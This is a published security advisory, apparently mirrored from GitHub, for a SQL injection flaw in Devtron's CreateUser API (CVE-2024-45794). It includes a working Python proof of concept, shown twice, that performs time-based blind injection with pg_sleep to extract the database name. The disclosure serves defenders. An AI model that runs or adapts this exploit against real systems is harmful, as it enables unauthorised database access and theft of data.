GHSA-Q78V-CV36-8FXJ

Vulnerability from github – Published: 2024-11-07 17:14 – Updated: 2024-11-07 19:29
VLAI?
Summary
Devtron has SQL Injection in CreateUser API
Details

Summary

An authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user).

Details

The API is CreateUser (/orchestrator/user).

The function to read user input is: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104

The userInfo (line 104) parameter can be controlled by users.

The SQL injection can happen in the code: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038

The query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query.

The user should be authenticated but only needs minimum permissions: image

PoC

Demonstrate a blind SQL injection to retrieve the database name:

import requests
import time
import string
import argparse

def blind(ip, token, query):
    url = f"http://{ip}/orchestrator/user"
    headers = {"token": token}
    entity = "chart-group"
    payload = f"'; {query} --"

    data = {"id": 111, "email_id": "abcd123@126.com", "superAdmin": False, "roleFilters":[{"team":"", "environment":"", "action": "", "entity": entity, "accessType": payload}]} #"EntityName": "test", "AccessType": "test", "Cluster": "",\"NameSpace": "devtroncd", "Group": "", "Kind": "", "Resource": "", "Workflow": ""
    start = time.time()
    res = requests.post(url, headers=headers, json = data)
    end = time.time()
    #print(res.content)
    if(end - start > 1):
        return True
    return False

def main(ip, token):
    chs = string.printable
    result = ""
    is_end = False
    i = 1
    while(not is_end):
        is_end = True
        for ch in chs:
            if(blind(ip, token, f"select case when substring(datname,{i},1)='{ch}' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1;")):
                print(ch)
                result += ch
                is_end = False
                break
        i += 1
    print(result)

if __name__ == "__main__":
    argparser = argparse.ArgumentParser()
    argparser.add_argument("--ip", "-i", type=str, help="Target IP")
    argparser.add_argument("--token", "-t", type=str, help="API TOKEN")
    args = argparser.parse_args()
    main(args.ip, args.token)

The debugging breakpoint indicated that the malicious SQL query was executed: image

We can see that we can get the database name: image

Impact

SQL injection vulnerability. Our tests indicate that the latest version is affected.

The reporters are Yuan Luo, Shuai Xiong from Tencent YunDing Security Lab.

Severity ?
8.3 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/devtron-labs/devtron"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.7.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-45794"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-07T17:14:04Z",
    "nvd_published_at": "2024-11-07T18:15:17Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAn authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user).\n\n### Details\nThe API is CreateUser (/orchestrator/user).\n\nThe function to read user input is:\nhttps://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104\n\nThe userInfo (line 104) parameter can be controlled by users.\n\nThe SQL injection can happen in the code:\nhttps://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038\n\nThe query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query.\n\nThe user should be authenticated but only needs minimum permissions:\n![image](https://github.com/user-attachments/assets/08ba940e-33a8-408d-9a1e-9cd1504b95c5)\n\n\n### PoC\n\nDemonstrate a blind SQL injection to retrieve the database name:\n\n```\nimport requests\nimport time\nimport string\nimport argparse\n\ndef blind(ip, token, query):\n    url = f\"http://{ip}/orchestrator/user\"\n    headers = {\"token\": token}\n    entity = \"chart-group\"\n    payload = f\"\u0027; {query} --\"\n\n    data = {\"id\": 111, \"email_id\": \"abcd123@126.com\", \"superAdmin\": False, \"roleFilters\":[{\"team\":\"\", \"environment\":\"\", \"action\": \"\", \"entity\": entity, \"accessType\": payload}]} #\"EntityName\": \"test\", \"AccessType\": \"test\", \"Cluster\": \"\",\\\"NameSpace\": \"devtroncd\", \"Group\": \"\", \"Kind\": \"\", \"Resource\": \"\", \"Workflow\": \"\"\n    start = time.time()\n    res = requests.post(url, headers=headers, json = data)\n    end = time.time()\n    #print(res.content)\n    if(end - start \u003e 1):\n        return True\n    return False\n\ndef main(ip, token):\n    chs = string.printable\n    result = \"\"\n    is_end = False\n    i = 1\n    while(not is_end):\n        is_end = True\n        for ch in chs:\n            if(blind(ip, token, f\"select case when substring(datname,{i},1)=\u0027{ch}\u0027 then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1;\")):\n                print(ch)\n                result += ch\n                is_end = False\n                break\n        i += 1\n    print(result)\n\nif __name__ == \"__main__\":\n    argparser = argparse.ArgumentParser()\n    argparser.add_argument(\"--ip\", \"-i\", type=str, help=\"Target IP\")\n    argparser.add_argument(\"--token\", \"-t\", type=str, help=\"API TOKEN\")\n    args = argparser.parse_args()\n    main(args.ip, args.token)\n```\n\nThe debugging breakpoint indicated that the malicious SQL query was executed:\n![image](https://github.com/user-attachments/assets/c9067360-8fb3-4d64-82e9-3af1e5e60969)\n\nWe can see that we can get the database name:\n![image](https://github.com/user-attachments/assets/29d5d969-876a-452d-be7f-8984d2a28c25)\n\n\n### Impact\nSQL injection vulnerability. Our tests indicate that the latest version is affected.\n\nThe reporters are Yuan Luo, Shuai Xiong from Tencent YunDing Security Lab.\n",
  "id": "GHSA-q78v-cv36-8fxj",
  "modified": "2024-11-07T19:29:30Z",
  "published": "2024-11-07T17:14:04Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/devtron-labs/devtron/security/advisories/GHSA-q78v-cv36-8fxj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45794"
    },
    {
      "type": "WEB",
      "url": "https://github.com/devtron-labs/devtron/commit/1540271bd777b6bccd288e513a9070d8f04b6056"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/devtron-labs/devtron"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Devtron has SQL Injection in CreateUser API"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.